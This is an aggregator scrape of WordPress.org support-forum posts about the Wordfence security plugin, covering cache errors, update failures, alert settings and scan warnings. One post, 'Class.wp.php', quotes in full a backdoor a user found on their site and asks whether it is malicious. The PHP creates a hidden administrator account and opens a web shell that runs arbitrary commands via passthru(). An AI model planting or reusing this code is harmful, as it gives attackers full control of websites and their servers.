Quantcast
Channel: WordPress.org Forums » [Wordfence Security - Firewall, Malware Scan, and Login Security] Support
Viewing all 33153 articles
Browse latest View live

WFCache persistent error

October 27, 2016, 3:49 am
$
0
0

Replies: 2

Hi All,

I’ve tried to disable and reinstall wordfence, disable the cache, but this problem still persists. It’s a cache problem with files that are not there, additionally my admin login is messed up and I get white pages of death:

Warning: include(public_html/letskyinnovations.com/wp-content/wfcache/www.letskyinnovations.com_mechanical/general.php): failed to open stream: No such file or directory in /home/public_html/letskyinnovations.com/wp-config.php on line 9

Warning: include(): Failed opening ‘public_html/letskyinnovations.com/wp-content/wfcache/www.letskyinnovations.com_mechanical/general.php’ for inclusion (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /public_html/letskyinnovations.com/wp-config.php on line 9

How do I fix this?

Thank you in advance,

Mike

Search

Google Speed Test error

October 27, 2016, 8:00 am

Alerts for administrator access signs in

October 27, 2016, 9:33 am
$
0
0

Replies: 0

Hi, I had set WordFence like this:

Alert me when someone with administrator access signs in
+ Only alert me when that administrator signs in from a new device or location

But it still send me an email each time I login, even if I always use the same IP and browser. Why?

plugin loading time

October 27, 2016, 9:50 am
$
0
0

Replies: 0

I had to disable Falcon caching (as you no longer support it) and to buy/install WP Rocket. Then I decided to re-check plugins impact on page loading time (I use P3 profiler every time I change plugins). I was really shocked to see 5x increase in Wordfence plugin loading time between Jan and Oct 2016. Does it have anything to do with disabled Falcon caching? Or this is the result of added functionality between the versions? My site is running on VPS and there were no major changes between Jan and Oct, at least in terms of hardware.

See attached screenshots with P3 results for Jan and Oct here:
Jan: https://www.dropbox.com/s/yzmjldy6lh7w9f2/Plugin%20loading%20time%20-%20Jan%202016.jpg?dl=0
Oct: https://www.dropbox.com/s/ogi9im73rmipekd/Plugin%20loading%20time%20-%20Oct%202016.jpg?dl=0

My Static Homepage Won’t Display Updates

October 27, 2016, 11:39 am
$
0
0

Replies: 0

I have an issue that started when I had to manually delete via FTP the Wordfence plugin. My hosting co disabled my account because it didn’t like the plugin’s activity on the server. I’m not sure what this has to do with anything…. but there were no problems before this.

My static home page will not show any updates or edits past the date that I deleted the Wordfence plugin. I didn’t have a caching plugin, but installed one to try to fix issue – WP Super Cache, and have repeatedly cleared the cache. This doesn’t help. I have looked at the htaccess file and deleted all but basic/essential WP info. When I clone the home page and view it as /copy-home all new content is displayed correctly. It’s when it’s set as the static home page that it isn’t working. I’ve tried everything!!

Notice: Undefined offset: 1 with wp-rocket

October 27, 2016, 4:37 pm
$
0
0

Replies: 0

Notice: Undefined offset: 1 in /home/comput17/public_html/wp-content/plugins/wp-rocket/inc/common/updater.php on line 45 0

WP-Rocket WAS installed but has uninstalled and deleted

Now using W3TC cache and all cache has been cleared

screenshot http://i.imgur.com/HJzGPB4.png

Prefer not to use the “Delete Wordfence tables and data on deactivation?” option

Thank you

Can’t update

October 27, 2016, 7:53 pm
$
0
0

Replies: 0

I’ve attempted to update the new version. But there is a message saying “Update Failed: The update cannot be installed because we will be unable to copy some files. This is usually due to inconsistent file permissions.

Problem commenting posts

October 27, 2016, 11:46 pm
$
0
0

Replies: 0

Newest Wordfence version 6.2.3 causes comments which include email address to go for moderation despite of site setting.

Search

Pre premium upgrade question…

October 28, 2016, 8:02 am
$
0
0

Replies: 2

Hey! WE have some scripts that need to be allowed to talk to our sites. For example… /dap/dap-zaxaa.php Will the premium version of Wordfence allow us to whitelist these?

Zaxaa is the payment processor we use and it needs to be able to send the user info over t the membership plugin we use ( DAP ).

Thanks for the help!

Class.wp.php

October 28, 2016, 10:34 am
$
0
0

Replies: 0

I run bazar shop theme on my website.

When I scanned with wordfence, it detected that an unknown file was in my wp-includes directory named class.wp.php. I deleted the file from the directory but have kept it on my desktop for observation. I am posting the code here, kindly tell me if it is malicious or not, or if it has other files as well.

<?php error_reporting(0);
include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
$table_name = $wpdb->get_blog_prefix();
$sample = 'a:1:{s:13:"administrator";b:1;}';
if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
if( isset($_GET['awu']) ) {
$wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', 't@e.st', '', '2011-06-07 00:00:00', '', '0', '1001010');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
if( isset($_GET['dwu']) ) {
$wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");}
if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
<input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
<textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>

Paid for Site Cleaning Service – credit card charged but no confirmation.

October 28, 2016, 10:43 am
$
0
0

Replies: 0

Good Day – I paid for Site Cleaning Service yesterday morning. our credit card was charged but we never received any confirmation or provided additional information. There is no other way to contact anyone there. How do we proceed?

Weird frontpage URLs indexed in Google

October 28, 2016, 11:17 am
$
0
0

Replies: 0

Recently I started noticing my homepage ranking results in Google changed. Normally just the homepage url was indexed and ranked, now when Googling some keywords, strange homepage url variations showup in Google. I found 3 of them:
mywebsite.com/?option=com_content&view=frontpage&Itemid=28
mywebsite.com/?option=com_content&view=frontpage&Itemid=75/
mywebsite.com/?option=com_k2&view=item&id=2%3Ahow-it-works%3F&Itemid=55

All these urls display the homepage and I have no idea where they came from or how to remove them.

I found a solution below, I just need to know how to include com_k2 in the statement as well.

Thank you very much.

add_action( 'wp', 'force_404_bad_query' );
function force_404_bad_query() {
	if ( (isset($_REQUEST["option"]) && ($_REQUEST["option"] == "com_content") )) {
		status_header( 404 );
		nocache_headers();
		include( get_query_template( '404' ) );
		die();
	}
}
  • This topic was modified 10 hours, 7 minutes ago by  ezflow.

Performance tab stops working

October 28, 2016, 11:41 am
$
0
0

Replies: 3

With 4.6.3 update the Peformance tab stops being accessible:
wp-admin/admin.php?page=WordfenceSitePerf
leads to
Sorry, you are not allowed to access this page.

Wordfence Alerts/Activity

October 28, 2016, 1:31 pm
$
0
0

Replies: 0

Hello,
Any emails notifications from WordPress and Wordfence are getting placed in my spam folder. I have been working with my host to correct this problem. Apparently my shared server has been blacklisted for email spamming.

My host has recommended two options:
1) Re-configure your script to send mail via SMTP mail instead.
2) Google fetch method.

From a Security/Wordfence perspective, which option do you recommend?

Do you have any other recommendations or concerns?

I have been logging in/out of my WordPress site to receive a Wordfence “Admin Login” alert email to monitor/test the methods above to see if my emails are still placed in the spam folder. Wordfence is emailing a login alert for my first login, but not any subsequent logins. I’m assuming Wordfence waits a certain time period before sending another “Admin Login” alert email. Just curious, what is that “Time Period” that must pass before another email login alert is sent out??

Thanks
Clint

Manually Deleted Wordfence – Other Files to Delete?

October 28, 2016, 1:38 pm
$
0
0

Replies: 0

I had to manually (via ftp) delete the Wordfence plugin. Are there other files containing Wordfence data that I need to delete or editi (to remove wordfence data)?

Search

Critical problem , What do i have to do?

October 28, 2016, 10:43 pm
$
0
0

Replies: 1

I got these messages from wordfence, whats that means?

Critical Problems:

* WordPress core file modified: wp-includes/post.php

Warnings:

* Unknown file in WordPress core: wp-includes/class.wp.php

* Unknown file in WordPress core: wp-includes/wp-cd.php

latest update

October 29, 2016, 2:20 am
$
0
0

Replies: 1

I just updated the latest version and now my “upcoming events list” does not work and I get this message at the bottom of each page (front end)

Parse error: syntax error, unexpected T_USE, expecting T_FUNCTION in /home/kzjmmwgc/public_html/wp-content/plugins/wp-statistics/vendor/s1lentium/iptools/src/IP.php on line 10

I think it is do with IP_V6 but I am not sure what to do. Help thxs

Moving my site to an add-on domain

October 29, 2016, 8:13 am
$
0
0

Replies: 0

I’m trying to move my site as an add-on domain for a different site. I’ve not yet moved the domain name, but the WordPress files and database have been installed in the new directory. When I try to execute the add-on site – http://blackdogdesigninc.com/jancopelandceramics/ – I get the following:

Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0

Fatal error: Unknown: Failed opening required ‘/home1/jancopel/public_html/wordfence-waf.php’ (include_path=’.:/usr/php/54/usr/share/pear:/usr/php/54/usr/share/php’) in Unknown on line 0

What changes do I need to make to what [configuration?] files in order to get Wordfence properly hooked into the new site location?

Many thanks in advance for the help!

Fatal error on line 440: Out of memory

October 29, 2016, 10:51 am
$
0
0

Replies: 1

Hi, I read in the 6.3.2 release notes that some memory errors have been fixed, so I gave an old problem a new try. Since I have WF I always get the following error, if I enable “Scan for signatures of known malicious files”.

Error message:

[Oct 29 19:40:40] Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 2434156 bytes) in /is/xxxxxx/wpxxxx_xxxxxx/_mydomain/wp-content/plugins/wordfence/lib/wfConfig.php on line 440

I have set 75 MB for the setting “How much memory should Wordfence request when scanning?”. I tried in the past with different setting, to no avail.

  • This topic was modified 10 hours, 35 minutes ago by  crispress.

Thank Heavens for Wordfence

October 29, 2016, 1:25 pm
$
0
0

Replies: 0

Just wanted to give a thumbs up to the Wordfence developers. I’m spending less time than ever defending my website. (I’m a pro blogger, with 7,000 – 10,000 uniques a day, after heavy bot defense and country blocking.)

My main defense is Wordfence (Premium), with various fairly stringent settings such as 48 hour blocks on URLs that trigger blocking, only two login tries, and a long list of “Immediately Ban” URLs harvested from bot attack attempts and error logs over past months.That’s combined with participating in the Wordfence “Real Time Security Network” as well as using Premium version country blocking.

Underpinning Wordfence, I maintain a fairly short but constantly improved .htaccess file, as well as using my server-host firewall to block backend login attempts (FTP, etc) after only two failed tries, with a rolling list of 400 blocked IP numbers.

(Behind all that, I have 4 different website backups, independent of each other, run at various times.)

Thanks be to Wordfence!

MTN

Viewing all 33153 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>